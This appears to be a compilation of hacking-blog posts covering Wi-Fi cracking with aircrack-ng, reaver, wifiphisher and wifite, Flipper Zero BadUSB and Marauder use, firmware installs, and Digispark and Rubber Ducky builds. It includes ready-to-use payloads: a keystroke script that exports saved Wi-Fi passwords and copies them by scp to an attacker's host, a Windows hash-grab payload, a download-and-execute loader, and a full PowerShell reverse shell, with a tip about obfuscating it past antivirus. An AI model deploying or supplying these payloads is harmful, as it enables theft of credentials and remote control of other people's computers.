How To Hack Wi-Fi Networks

Wi-Fi networks are everywhere! Whether you’re in an industrial or residential area, there will likely be a Wi-Fi access point nearby. They allow us to have instant access to any information we need. They allow us to communicate with people on the other side of the world. We’re living in interesting times where information travels at the speed of light. Hello world, welcome to haxez where today I will be explaining how to hack Wi-Fi networks. If you’re looking for more information on the subject then head over to this article on Bordergate. Also, please go and watch the video at the bottom of the page.

Wi-Fi Hacking Hardware

While it might be possible to perform some Wi-Fi attacks using your built-in Wi-Fi chipset, you will have better success with the proper kit. There are dozens of manufacturers that make claims that their product offers the required functionality. However, after purchasing a bunch of cheap products and some expensive ones, I can honestly say that the Alfa makes the best devices for the job. In order to hack wireless networks, you need to be able to put the card in monitor mode and be able to perform packet injection. Some Alfa cards may be better than others but I’ve had a lot of luck with the AWUS036ACH.

Alfa Card

Wi-Fi Brute-Force Attacks

One attack that doesn’t get mentioned much when discussing Wi-Fi hacking is brute force attacks. Brute force attacks are one of the most common methods that threat actors use to gain access to a system. If the system is secured using a weak password then a brute force attack should get you access to that system pretty quickly. Obviously, this discounts brute force protection mechanisms. However, you would be surprised at how many products don’t offer brute force protection by default. With a few lines of Python, it is possible to brute force the access point’s password. See this GitHub repository for an example.

Brute Force Wi-Fi Password

Wi-Fi Deauthentication Attack

A Wi-Fi deauthentication attack is an attack that abuses the built-in functionality of the access point. The threat actor would impersonate the access point and send spoofed packets to a client. These packets deauthenticate the client. As a result, the client is disconnected from the access point. In order for the client to reconnect to the access point, it needs to send the secret to re-authenticate. The threat actor can then intercept the packet containing the secret and crack it to reveal the access point’s password.

First, you need to put your Wi-Fi adapter into monitor mode and start capturing data. This can be done using airodump-ng.

sudo airodump-ng wlan0

Then, you should start receiving information about the access points nearby.

Wi-Fi Hacking Airodump-ng

Once you know which Wi-Fi network you want to attack, make a note of the BSSID and the channel number. Next, you need to start capturing packets from that AP and writing them to your local storage. This can be done using the airodump-ng tool again.

sudo airodump-ng --bssid <BSSID> --channel <CHANNEL> --write handshake wlan0
Capturing Wi-Fi Packets

Next, you need to identify a client to perform the attack. As you can see from the image above, one client has connected and we can see its station ID. Take note of the station ID as it will be needed for the next part of the attack. Using the tool aireplay-ng we can start creating the de-authentication packets and sending them to the client.

sudo aireplay-ng --deauth 4 -a <BSSID> -c <CLIENT STATION ID> wlan0
Wi-Fi Deauthentication Attack

Finally, it’s time to crack the password from the packet we just captured. In order to do this we need to use the tool aircrack-ng. First, we specify the wordlist, then the AP BSSID, and finally the packet capture file.

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> handshake.cap
Cracking the hash

WPS Pixie-Dust Attack

WPS or Wi-Fi protected setup is a feature of wireless access points that allows for easy pairing of wireless devices. It was created and released by Cisco in 2006 and has since seen several vulnerabilities. One of these vulnerabilities is known as a Pixie Dust attack which brute forces the WPS feature of wireless access points. In order to carry out this attack we first need to set our Wi-Fi adapter to monitor mode.

sudo airmon-ng start wlan0

Next, we need to use the tool wash to identify Wi-Fi access points in the area that have WPS enabled.

sudo wash -i wlan0
WPS Pixie-Dust Attack

Take the BSSID and the channel number from the output. Finally, we need to run the tool reaver to start the attack. As you can see from the command below, we’re specifying the BSSID, and the channel number, adding verbosity, specifying an output file, and setting the pixie dust argument to 1. After a few moments, you will receive a bunch of output including the WPS pin and WPA PSK.

sudo reaver --interface wlan0 --bssid <BSSID> --channel <CHANNEL> -vv -N -O output.pcap --pixie-dust 1

Evil Twin Attack

An evil twin attack is an attack where the threat actor essentially clones a legitimate access point and coerces the victim to connect to it. Once the victim is connected, the threat actor can then carry out several attacks such as forcing the victim to submit their credentials to a captive portal. This type of attack can be performed using the tool wifiphisher. Once run, you will see a number of access points. Select the one you want to attack.

sudo wifiphisher
wifiphisher

The attack we’re going to be demonstrating is the captive portal attack which will ask the user for their password. Select the attack you want and the tool should start attacking the access point to deauth clients and prevent them from reconnecting.

available phishing scenarios

The clients should then automatically connect to the threat actor’s access point and load the captive portal. The portal will access them for their password. The captive portal page can be customized to mimic social networking sites or even a page mimicking the ISP that provided the access point.

Wifi Captive Portal

Anything submitted to the captive portal is sent to the threat actor in clear text. If the user submits their Wi-Fi password then the threat actor could now connect to the victim’s Wi-Fi and access their internal network. If they submitted their social media details then the threat actor would have that password which could be used for other online services.

Clear text credentials captured.

Wi-Fi Hacking With Wifite

We have covered a lot of attacks, some of which have a complicated setup and use multiple tools. However, there is one tool that does almost all of them. That tool is called wifite and it’s a wrapper for the other tools we have used. It’s simple to use, all you need to do is run the wifite command. Within a few seconds, you should start seeing wifi networks pop up.

sudo wifite
Wi-Fi - Wifite

When you see the network you want to attack, press control c to stop scanning. Then, input the number of the network you want to attack. Wifite will then go through each attack until it finds an attack that works. If you know that a certain type of attack isn’t going to work, it can be skipped with control c. Finally, if the attack is successful, it should automatically crack the password and display the results.

hacked

Wi-Fi Hacking Conclusions

While technology is catching up to these types of attacks, your home access point may not have those features. Also, it may not be configured to protect against these attacks out of the box. You want to make sure you’re using long complex passwords not found in wordlists. This will help ensure that even if the threat actor captures the secret, they can’t crack it. Furthermore, you should disable technologies like WPS. If you need it to connect a printer, do so but then disable it after. Anyway, the real reason for this post is to try and get more eyes on the demonstration video below. Please go check it out.

Stealing Passwords With The Flipper Zero

Hello world and welcome to HaXeZ, in this post I’m going to be stealing passwords with the Flipper Zero. A Bad USB attack is an attack that leverages the trust that computers have for USB devices like keyboards. We will use this attack to perform keystroke injection to carry out our evil intentions. Ok, it’s a purely educational post to show the dangers of such an attack. But also because Flipper Zero has a really cool UI for doing such attacks. The following payloads can all be found at https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky. I take no credit for any of them.

Flipper Zero Bad USB Menu
Flipper Zero Bad USB Menu

Our First Flipper Zero BadUSB Payload

The first thing we’re going to do is create a payload that opens up a terminal and executes a command. For this, we’re going to be using Ducky Script which Is the native language of the Hak5 USB Rubber Ducky. The script below starts with a delay of 100. This is to ensure that the computer has recognized the device before executing the script. Then, it has a comment of “opens run”. Next, the script injects the Windows key (GUI) and the r key. This combination of keys opens the run dialog box. Then, there is another delay of 100 seconds before a string of text is injected. The text string is injected into the run box and tells the system to open a Powershell window.

The script then has a delay of 1000 to wait for the Powershell window to open. After, the script then injects a string telling Powershell to add the Assembly Name Presentation Framework. This framework is required for creating pop-up boxes. Next, the script injects enter followed by another delay and then another string. This string will create a pop-up box informing the user that they have been hacked.

DELAY 100
REM opens run
GUI r
DELAY 100
STRING powershell -windowstyle hidden
ENTER
DELAY 1000
STRING Add-Type -AssemblyName PresentationFramework
ENTER
DELAY 1000
STRING [System.Windows.MessageBox]::Show('!!! YOU HAVE BEEN HAXED !!!')
ENTER
DELAY 10000
STRING exit
ENTER

Now, we need to save it as a text file and drop it into the BadUSB directory on the Flipper. Then, to test it, we need to close the Flipper desktop application. After that, connect the Flipper Zero again and navigate to the Bad USB payloads. Then, select the payload and run it.

BadUSB Directory
BadUSB Directory

Flipper BadUSB Browser Pranks

Granted the previous payload doesn’t really do anything. However, it does demonstrate that the Flipper can be used to launch a Powershell window and execute commands. With that in mind, we can leverage that ability to perform other types of pranks or attacks.

For example, wouldn’t it be fun if you could “instantly” Rick Roll someone by connecting to their computer? The script below sort of does that. As with the previous script, it first has a delay of 100 and then it launches the run dialog box. Then, it inserts a URL which the run box will open with the system’s default browser. Next, has another delay and then types the f key to make the video full screen. It then hits the F11 key to hide the URL and menu bars. Granted, it isn’t perfect. Some browsers don’t auto-play videos but you can tinker with it to make it better.

REM Rick Rolling
DELAY 100
REM opens run
GUI r
DELAY 100
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstley
ENTER
DELAY 1000
f
BadUSB Rick Roll
BadUSB Rick Roll

Stealing Wi-Fi Passwords

Stealing Wi-Fi passwords is pretty simple with Flipper Zero. However, exfiltrating the Wi-Fi passwords from the victim’s system is where you may run into problems. You should definitely not use the method below. It’s dirty and quick and would allow anyone to find the password for your server. It uses SCP to upload the files to your server which requires authenticating. I’m using it as a quick way to demonstrate stealing Wi-Fi passwords. You should absolutely use something more secure such as sending the data via email or a POST request to a web server.

With the obvious out the way, this script launches a Windows Command Prompt and changes the directory to the temp directory. Next, it runs a command to export the Wi-Fi network settings for the access points remembered by the target. It spits these out as XML files in the %temp% directory. Next is where you should absolutely change the script. It uses SCP to transfer the files to the server. However, the server requires authentication so it adds a delay and then inputs the password of kali as a string.

Note that if this victim’s machine hasn’t spoken to your Kali server before then it will first need to accept the SSH disclaimer. This could be achieved by adding in another “ENTER” after the scp command and before the password is passed as a string.

REM Wifi password stealer
DELAY 100
GUI r
DELAY 100
STRING cmd
ENTER
DELAY 1000
STRING cd %temp%
ENTER
DELAY 1000
REM exports the wifi passwords as XML
STRING netsh wlan export profile key=clear
ENTER
DELAY 1000
REM copys the files to kali host
STRING scp -r %temp%/*.xml kali"192.168.0.56:/home/kali/loot
ENTER
DELAY 1000
STRING kali
ENTER

The image below shows that the files have been successfully transferred to the Kali server using the SCP tool.

Stealing Wi-Fi Passwords
Stealing Wi-Fi Passwords

The screenshot below shows the output from using cat against the file. The highlighted section is the password for the access point called “Super Secure Access Point”. The password is Password1337!@ which a threat actor could now use to connect to the access point. Once on the network, they could get up to all sorts of nefarious things.

Wi-Fi Password Stolen
Wi-Fi Password Stolen

Stealing Windows Passwords Hashes

The next payload is taken directly from Hak5 and was a good attack against machines connected to a domain. Furthermore, it had the potential to allow you to steal Windows password hashes in a matter of seconds. It requires the use of the Impacket smbserver.py Python script.

REM Super Quick Hash Grab Payload for USB Rubber Ducky
REM Target: Windows 9X and beyond! Author: Hak5Darren
DELAY 1000
GUI r
DELAY 100
STRING \\hostname
ENTER

The screenshot below illustrates stealing Windows password hashes using the USB Rubber Ducky payload above. As you can see the user joseph on the host authenticated successfully against the SMB server thus submitting the password hash to the server. This hash can now be taken offline and cracked.

Stealing Windows Passwords Hashes
Stealing Windows Passwords Hashes

For the full Hak5 write up please see the URL https://shop.hak5.org/blogs/usb-rubber-ducky/whats-the-quickest-way-to-steal-a-windows-password-hash. Hak5 also has an awesome write-up of using Mimikatz with the USB Rubber Ducky to steal Windows password hashes. I highly recommend giving it a read here https://shop.hak5.org/blogs/usb-rubber-ducky/15-second-password-hack-mr-robot-style.

Conclusions

I’m having a lot of fun with the Flipper Zero. The reason why I like the BadUSB feature so much is because of the user interface it provides. The fact that you have an easy-to-navigate user interface for selecting payloads makes it much more user-friendly. It allows you to store multiple payloads and select them easily which could be really useful for physical intrusion assessments. You could be in an environment that has Windows, Linux, and Apple machines. You could load your Flipper with various different payloads for various different operating systems and go nuts.

Marauding Wi-Fi Networks With The Flipper Zero

Hello world and welcome to Haxez, today I’m going to be talking about using your Flipper Zero to attack Wi-Fi networks. By default, the Flipper Zero doesn’t have Wi-Fi capabilities. However, with the addition of the Wi-Fi developer board, you can add this functionality. The Wi-Fi developer board is rocking an ESP32-S2 module. With this module, you can perform Wi-Fi penetration testing such as probing attacks, de-authentication attacks, SSID rickrolling, and more.

lipper Zero Wi-Fi developer board
Flipper Zero Wi-Fi developer board

Installing Marauder to the Wi-Fi Development Board

The Wi-Fi developer board can be purchased from the Flipper Zero website for $29.00. Obviously, As I’m in the UK I purchased mine from Joom for £36.60 excluding VAT and shipping (Ouch). As mentioned previously, the board adds Wi-Fi functionality to the Flipper Zero but you need to do a bit of work beforehand.

First, you need to download the Marauder firmware and flash it to the developer board. I would recommend using the UberGuidoZ Flipper repository to make the process easier. Unzip the zip archive and locate the flash.bat file. Then, while holding down the boot button, connect the Wi-Fi development board to your computer via USB and hold the boot button down for 3 seconds.

Booting the Wi-Fi Development Board
Booting the Wi-Fi Development Board

Your computer should recognize the device. Now, double-click the batch file. You may get a Windows security alert, if that is the case click show more and then run anyway. This should spawn a command prompt window similar to the one below. Furthermore, it should have a number of options including the ability to flash the Marauder firmware. Select option 1 and wait patiently for it to install.

Installing Marauder firmware
Installing Marauder firmware

Adding Wi-Fi Functionality To The Flipper Zero

Unfortunately, Flipper Zero doesn’t have the functionality to use the Marauder Firmware out of the box. However, you can install some custom firmware that contains the Marauder tools in order to use it. Although, That is going to be outside the scope of this post but feel free to click the image below to read my article on installing the RogueMaster firmware. Once you’ve read that, come back here and finish the article.

Making Flipper Zero Ultra with RogueMaster Firmware
Making Flipper Zero Ultra with RogueMaster Firmware

Marauder Menu

Now that you have Maurader and RogueMaster installed, you should have access to the Marauder menu on your Flipper Zero. In order to access it, head to Applications > GPIO > [ESP32 WiFi Marauder]. After selecting Marauder you should have a number of options including View Log from, Scap AP, SSID, List, Select, Clear List, Attack, Beacon Spam, Sniff, Sniff PMKID on channel, Channel, Settings, Update, Reboot, and Help. Some of these options have sub-options that can be accessed by pressing left or right on your Flipper.

Marauder Wi-Fi Menu
Marauder Wi-Fi Menu

Scanning Access Points

One of the first options in Marauder is Scan AP. This option lets you scan for access points within your nearby area. Furthermore, the results of these scans can be used with other attacks such as de-authentication and probe attacks. The image below shows that I have started a scan for local access points. The results will be displayed below and saved to the AP list.

Scanning For Wi-Fi Access Points
Scanning For Wi-Fi Access Points

Listing Access Points

The next option in the list is to list the access points that you have just scanned. This is a convenient feature as it assigns a number to each of the access points. This number can be used later to select the access point you want to attack. The image below shows the results of running the list command after running the Scan AP command. As you can see, it shows 5 access points (0 to 5). However, the list can be scrolled on indefinitely depending on the number of access points.

List of Wi-Fi access points
List of Wi-Fi access points

Selecting An Access Point

The select option allows you to select an access point based on the list. At least, that’s what I hope it is doing. Regardless, the option presents a keyboard that allows you to type in the access point you want to select. Once selected, you can then launch attacks against the selected access point.

Selecting An Access Point
Selecting An Access Point

Rick Roll Attack

The first attack that I’m going to talk about is the Rick Roll attack. That’s right, you can rickroll people but not in the conventional sense of sending them the Youtube URL. This attack is mostly harmless but is a cool party trick. By selecting the Rick Roll attack method, you send data out from the Flipper Wi-Fi board and create a bunch of dummy access points named in accordance with the lyrics from the song. As you can see from the image below, I have launched the attack and there are a number of new access points available.

Wi-Fi Rick Roll Attack
Wi-Fi Rick Roll Attack

Wi-Fi De-Authentication Attack

The next attack I want to talk about is the Wi-Fi de-authentication attack. This attack can be useful when trying to capture handshakes. Wireless handshakes will contain the hashed password for the access point. Capturing the hash would allow you to crack it and then access the access point. The de-authentication attack works by sending de-authentication frames to the wireless access point. This packet is usually spoofed from the client and forces them to disconnect.

Wi-Fi De-Authentication Attack
Wi-Fi De-Authentication Attack

Probe Attack

Probes are sent out by devices when not connected to a wireless access point. They send probes for access points that they have previously connected to in order to see if the access point responds. A probe attack is essentially spamming probe requests to the select access point. I believe the desired output of this attack is to confuse the access point and potentially consume resources leading to a denial of service conditions. Don’t quote me on that though as I’m not 100% sure and am just going off of the articles I’ve read so far. I will update this if I get any more insight into the purpose of this attack.

Wi-Fi Probe Attack
Wi-Fi Probe Attack

Sniffing

The Wi-Fi developer board with Marauder also has a number of sniffing options including sniffing de-authentication packets, pwnagatchi packets, beacon packets, esp packets, and pmkid packets. I haven’t played with the sniffing options too much but it doesn’t seem like you can run both attack payloads and sniffing payloads at the same time. I will look into these options further at a later date.

Sniffing
Sniffing

Conclusions

There is a lot more to the Marauder firmware than I’ve covered in this post. it has the ability to sniff packets and other things that I haven’t explored yet. However, I wanted to make a post about it as there aren’t many posts about it. Hopefully, this should get you up and running with the Marauder firmware and more people will make content about it. Anyway, the firmware and Wi-Fi development board are excellent additions to the Flipper Zero if you’re looking to increase its functionality. I can’t wait to see what other things people make.

Making Flipper Zero Ultra with RogueMaster Firmware

Hello world and welcome to Haxez, in this post I’m going to be installing the RogueMaster Flipper Zero firmware. The RogueMaster firmware adds more functionality to the device by installing community applications. Installing the RogueMaster firmware is a fairly straightforward process. However, it is probably best to ensure you have updated and backed up your device first.

Updating The Flipper Zero

First, let’s update the device to the latest version. This can be done relatively quickly by installing the desktop application. You can download the application here and installing it is just a case of following the wizard. Once the application is installed, connect your device to it and look for the big green update button. Click the button and wait for the installation process to complete.

Updating the Flipper Zero
Updating the Flipper Zero

Back-Up The Flipper Zero

You should back up your device by heading to the spanner tab and clicking the backup button. When clicked, this button will spawn a Windows explorer window asking you where you want to save your backup. Then, choose a safe location on your computer and click save. Now that you have updated and backed up your device, it’s time to find the firmware.

Back-Up The Flipper Zero
Back-Up The Flipper Zero

Finding RogueMaster Firmware

The RogueMaster firmware can be found by performing a Google search for RogueMaster Firmware. In fact, the correct Github page should be first the result. Click the link and visit the page and then look for the correct repository.

RogueMaster GitHub Page
RogueMaster GitHub Page

Once there, look for the released section. It should be on the right-hand side of the page. While there should be three options, the one I’m going to be downloading is the .tgz file. However, this could be a .zip file depending on the current release. A .tgz file is an archiving format similar to .zip but you may need to install an additional tool like 7zip to extract it. Just right-click the downloaded file and select 7zip from the context menu, then select extract. You may need to extract the extracted file.

RogueMaster Firmware Download
RogueMaster Firmware Download

Uploading The Files

Once the tar.gz and tar files have been extracted, head to the Flipper desktop application and navigate to the SD card. Locate the update directory and navigate to it. Then, drag the extracted directory to the uploads directory. You may get an error message complaining that the files are too large. However, it is safe to ignore that message.

Uploading The Files
Uploading The Files

Installing The RogueMaster Firmware

Now that the files have been uploaded, head back to the main screen of the application and click on the Flipper Zero screen to expand it. Then, press the down button followed by the left button. That should allow you to browse the directories on the Flipper Zero including the update directory. From there, you should be able to navigate to the uploaded directory and locate the update package. Click on the package and select Run in app.

Installing The RogueMaster Firmware
Installing The RogueMaster Firmware

Flipper Zero Update Complete

If you successfully installed the firmware then you should get a lovely picture of Goku suggesting that the installation was successful. Furthermore, you should get a link to join the GitHub community. If you run into issues then just reinstall the default software and go back through the installation process.

Update Complete
Update Complete

Flipper Zero RogueMaster New Features

The RogueMaster firmware includes many new features including the Sub-GHz frequencies required to hack open the Tesla charge ports. There is also a vast selection of games including Doom, Flappy Bird, Tetris, and Tic Tac Toe. To list all of the features and their purposes would require devoting an entire blog post. Feel free to check out my video where I go into a bit more detail.

New Features
New Features

Unleashing the power of the Flipper Zero

Hello world and welcome to Haxez, today we’re unleashing the power of the Flipper Zero by installing custom firmware. However, the first thing we need to do is ensure that the flipper is up to date. Therefore, head to the following URL and download the updater. Disclaimer, I’m not affiliated with the makers of the Flipper Zero in any way, nor is this sponsored. I’m merely making content for it because I like the device.

Updating Flipper Firmware
Updating Flipper Firmware

Updating Flipper Zero

Once the Flipper Zero desktop software is downloaded, launch it from the icon. Then, connect your Flipper Zero to your computer via the supplied USB C cable. The application should automatically detect the version of firmware that you have installed. If you’re up to date then you can skip this step. However, if you’re out of date then proceed and click the install button.

Updating The Flipper Zero
Updating The Flipper Zero

Backing Up Flipper Zero

Next, it is probably a good idea to back up your device. This can be accomplished fairly easily by clicking on the spanner menu button. There, you will have a number of options including backup, restore, erase and check for updates. All you need to do is click the backup button and save the file that it creates to a safe location.

Backing Up Flipper Zero
Backing Up Flipper Zero

According to the Flipper blog, the firmware update process is fairly bulletproof. However, whenever you’re updating firmware whether it’s your BIOS or you’re rooting a phone, you need to be careful. If the device was to lose power while the new firmware is being written, it could brick your device. The Flipper device seems to have a method for updating the firmware whereby the old firmware remains on the device until the firmware is installed.

Flipper Zero Update Process
Flipper Zero Update Process

Finding Custom Firmware

Now that you have updated your Flipper and have taken a backup, it’s time to find some custom Firmware. The firmware that I’m going to be installing is called the unleashed firmware by Eng1n33r. This firmware is easy to install and has a number of different additional features. Notably, the firmware includes some community applications that provide functionality like fuzzing. Furthermore, there are some games including Doom.

Flipper Zero Unleashed Firmware
Flipper Zero Unleashed Firmware

Downloading Custom Firmware

In order to download the custom firmware, head to the releases page on Github. There, you will see a link to a .tgz file. Click the link and save the file to a safe location on your computer. Please be advised that there is a web installer that can simplify the installation process. However, when I attempted to use the web updater it didn’t work. You need to use a Chromium-based browser but I think I had problems due to the firmware version I had installed.

Downloading Custom Firmware

Installing Flipper Zero Custom Firmware

In order to install the custom firmware, all you need to do is head back to the Flipper Desktop application. Back on the settings page, you will find an option to install from the file. Click that option and navigate to the .tgz file that you just downloaded. The desktop application will then switch to a progress bar showing you the installation progress.

Installing Custom Firmware
Installing Custom Firmware

Once the Flipper desktop application reaches 100% it should prompt you to say to follow along on the Flipper Zero device itself. After a few minutes, you should get a notification that the Unleashed firmware has been installed successfully. It should look similar to the image below.

Unleashed Firmware Successfully Installed
Unleashed Firmware Successfully Installed

Unleashed Firmware Features

I’m not going to go into all the features of the firmware in this post. Perhaps, this is something I will write another post and create another video on at a later date. It is packed with new apps including games though. If you fancy playing a bit of Doom, Tetris, or Flappy Bird in between your hacking activities then you now have the option to do that. You can see the full list of features on this page.

Unleashed Firmware Features
Unleashed Firmware Features

Conclusions

This post wasn’t meant to be a full breakdown of all the different features of the Unleashed Firmware. That is something I may go into more at a later date. The purpose of this post was to explain how to locate and safely install custom firmware. The developer has great installation instructions on their GitHub page so this article may be redundant but I wanted to create one. I’m enjoying using the unleashed firmware. It adds some great functionality. However, I will probably be looking at moving to the Roguemaster firmware in the near future.

Hack all the things with the Flipper Zero. Unboxing, Updating, and Playing

Hello world and welcome to Haxez. Recently, I was lucky enough to have my Flipper Zero delivered. If you don’t know what the Flipper Zero is then you should absolutely check it out. In their own words, it is a Swiss army knife for hackers. It has many different features including a cute dolphin Tamagotchi.

Unboxing the Flipper Zero

The Flipper Zero comes in a neat cardboard box with some cool graphics. The box was sealed with tape which was easily dispatched with a knife. Opening the box, you are presented with the instruction manual document. Underneath the manual is a foam housing protecting a USB C cable. Then, underneath the foam USB C holder is the glorious Flipper Zero. Not much more to say about it than that.

Unboxing the Flipper Zero

Updating The Flipper Zero

Updating the device was relatively simple. In fact, all I had to do was visit the software URL and download the installed. Once the software was installed, I connected the device to my laptop and it instantly recognized it. As can be seen from the image below, the interface is great and it has an obvious Update button. In summary, the update process took about 10 minutes with most of that time taken up by writing the firmware to the device.

Updating The Flipper Zero
Updating The Flipper Zero

NFC Hacking

The device has the ability to clone and simulate NFC or near-field communication signals. Instantly, I decided to check this out by cloning the fob I used to enter my flat. Overall, the process was straightforward and worked like a charm. In short, you select NFC from the menu and then select read. Then, save the NFC signal to the device and use the simulate option to send the signal. Suddenly, the door unlocked and I was into my building.

NFC Hacking
NFC Hacking

BadUSB

The device also has a built-in BadUSB. To explain, a BadUSB is a device that can emulate keyboard input. Darren Kitchen from Hak5 brought this weakness of trusted devices to the attention of the hacker community when they released the USB Rubber Ducky. Since then, it has been a viable attack vector to quickly execute commands on a host that you have physical access to. It was really intuitive to use, just plug in the device and select the payload from the menu and it executes it.

BadUSB
BadUSB

Infrared

I used to have an infrared light on my mobile phone and I thought it was the coolest thing ever. Being able to change channels on anyone’s TV gave me a silly sense of power. Since then, I have upgraded and lost that functionality. However, that power has now been restored with the Flipper Zero. After applying the update you get access to a universal remote control which you can use to control the universe… wait I mean TV’s and other infrared devices.

Infrared
Infrared

Conclusions

I love this device and can’t wait to test out more of its functionality. I definitely need to get the Wifi development breakout board to do some Wifi shenanigans but so far I’ve had a lot of fun with it. Unfortunately, I couldn’t get it to work with my car’s central locking. While the device reads the signal fine, sending it to the car does nothing. I suspect this has something to do with the rolling key security mechanism built into car keys but I digress. Anyway, this was a quick review of the Flipper Zero, so far so awesome. I can’t wait to experiment with the massive amount of features. I have barely scrapped the surface.

Hack Any Computer In 2 Seconds With This £2 Device | Digispark

Hello World and welcome to HaXeZ. In this post, I will be discussing the Digispark. With the right payload, the Digispark can hack any computer in 2 seconds. I realize that’s a bold claim to make and is definitely a clickbait title but it isn’t far from the truth. The Digispark, like the Hak5 USB Rubber Ducky, is a keyboard emulator that can inject keystrokes on the target computer at breakneck speeds. Therefore, anything a hacker can do on a keyboard, the Digispark can do too but arguably faster. So, If you’re having trouble getting hold of a Hak5 USB Rubber Ducky then this could be the device for you. For about £2 and a bit of time, you can build your own Rubber Ducky from a Digispark. I’ve written another article using a different board, feel free to check that one out here.

Arduino Integrated Development Environment

The first step in creating your very own DIY USB Rubber Ducky super hacking tool is to download the Arduino Integrated Development Environment. This can be downloaded from the following URL https://www.arduino.cc/en/software. Simply visit the URL, click the download link, double-click the downloaded file and then follow the installation wizard.

Arduino Integrated Development Environment
Arduino Integrated Development Environment

Configuring Arduino IDE

Once you have installed the Arduino IDE, you need to configure it so that it can write your payloads to the Digispark. In order to do this, first launch the Arduino IDE then head to File, then Preferences, then paste the following URL into the Additional Boards Manager URLs input box. This allows the Arduino IDE to work with third-party boards such as the Digispark.

http://digistump.com/package_digistump_index.json

Digispark Additional Boards Manager URLS
Digispark Additional Boards Manager URLS

Install Digispark AVR Boards

Next, you need to install the Digistump Digispark boards so that the Arduino IDE knows how to talk to your board. To do this, head to Tools, Board and click Boards Manager. Then from the drop-down menu select contributed and search for the Digistump AVR Boards. There should be an install button, click that and wait for the boards to finish installing.

Arduino Boards Manager
Arduino Boards Manager

Digispark Drivers

That should be everything you need. However, if Windows is having trouble recognizing your board then you may need to install the drivers manually. You can find these by performing a quick Google search for “Digispark Arduino Drivers”. This should take you to the following GitHub page which has a download link labeled Digistump.Drivers.zip. Download, extract and install these drivers.

https://github.com/digistump/DigistumpArduino/releases 
Digispark Drivers
Digispark Drivers

Digispark Payloads

Now that you’re Arduino IDE is set up and the drivers are installed, it’s time to find some payloads. There are tons of payloads available on the internet that do various things. These payloads range from performing a fake Windows update while playing Never Gonna Give You Up by Rick Astley to launching a Fork Bomb on the target system. I hope it goes without saying that some of these payloads can be dangerous and you should exercise caution when playing with them. The following GitHub repository has some good payloads to practice with.

https://github.com/CedArctic/DigiSpark-Scripts
Digispark Payloads
Digispark Payloads

Reverse Shell Downloader Payload

The payload I’m going to be focusing on is the Powershell reverse shell payload. You can see from the script below that this is a fairly simple script. It starts by sending the Windows Key and R to the computer. This opens the Run dialog box. After a brief delay, it types out “powershell.exe” into the Run dialog box and then sends the Enter key. This spawns a new Powershell window. In the new Powershell Window, it types out a command to download another payload from a URL. After a brief delay, it then executes the payload.

// This script downloads and executes a powershell script efectively opening up a reverse shell in less than 3 seconds. 
// Credits to hak5 and samratashok (developer of the nishang framework).

#include "DigiKeyboard.h"
void setup() {
}

void loop() {
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("powershell.exe");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("Invoke-WebRequest -Uri 'https://haxez.org/payload.ps1' -OutFile 'payload.ps1'");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("./payload.ps1");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  for (;;) {
    /*Stops the digispark from running the scipt again*/
  }
}

Powershell Reverse Shell Payload

Please note that the following Powershell script will probably be caught by Windows Defender. However, with some tinkering like renaming variables and obfuscating the code, it may not be detected. I won’t be attempting to do that in this walkthrough. The following script is a reverse shell that will attempt to connect back to the IP address and port that you specify. This script will need to be uploaded to a server that you control and then the location of the script needs to be added to the downloader payload above.

#A simple and small reverse shell by samratashok's Nishang framework. Change the Host IP Address and Port according to your setup as described in the README file of the script. 
$sm=(New-Object Net.Sockets.TCPClient("192.168.0.23",4243)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Writing Payloads To Digispark

Once you have your payloads ready, it’s time to write the downloader payload to the Digispark. It’s important that you don’t plug in the Digispark first. First, paste your code into the Arduino IDE and then click the upload button. This will then spawn a terminal at the bottom of the application prompting you to plugin the device. You should now be able to plug in your Digispark. Once the terminal reads 100%, the payload will automatically execute. Probably best if you don’t try to use any payload that can potentially damage your computer.

Upload Payload To Digispark
Upload Payload To Digispark

Digispark Demonstration

With the payload written to the Digispark, it’s time to test it out. Ensure that you have uploaded the reverse shell payload to your web server and that the path has been amended in your download payload. Then set up a net cat listener or some other listener on your attack machine (the machine you want to connect back to) and plug the Digispark into the target machine. As mentioned previously, this will only likely work with Defender disabled unless you have modified your payload. However, please see the video below of a demonstration.

PwnHub Digispark Demonstration

Conclusions

The Digispark is a fantastic affordable device that has a lot of flexibility. The price alone is enough to justify owning one and tinkering with it. Granted the introduction about it being able to hack a computer in 2 seconds is a bit of an exaggeration but I hope you can see the potential from the write-up. You can use it for automation rather than hacking. You can tell it to do anything a keyboard can do provided the payload fits on the 6000kb chip. I had a lot of fun with it and will be keeping a few preconfigured ones in my hack bag at all times… just in case. Anyway, check out the video below for a more hands-on demonstration.

DIY USB Rubber Ducky

The pen…drive is mightier than the sword. The rubber ducky, first conceptualised and popularised by Darren Kitchen from hak5 is a USB keyboard emulator. It gives the wielder of this device unlimited power, at least on computer systems. The emulator injects keystrokes into the victim’s machine with unprecedented speed and precision. The right combination of keystrokes will do great but unspeakable things.

The USB rubber ducky https://shop.hak5.org/products/usb-rubber-ducky-deluxe currently sells for $49.99 which is a reasonable price and I would highly recommend purchasing one to support Hak5. However, if for some reason you are unable to get hold of one then pick yourself up a CJMCU virtual keyboard. You will also need a micro SD card, a micro SD card reader, a rubber duck and a coffee.

Installing the Arduino Integrated Development Environment

Once you have your coffee and your CJMCU you will need to download and install the Arduino integrated development environment. This can be download from the Microsoft Store if you are using Windows or you can get it from their website if you are using linux. https://www.arduino.cc/en/guide/linux

Next you will need to get Duckduino from Seytonic’s github repository.

Uploading the .ino Script

The next thing to do is insert your CJMCU into a USB port and launch the Arduino IDE. Before going any further, you may need to check that the right board and COM port is selected. Both of these can be configured from the tools menu. Since the CJMCU board is a clone of the Leonardo board that’s the board I selected from the boards menu.

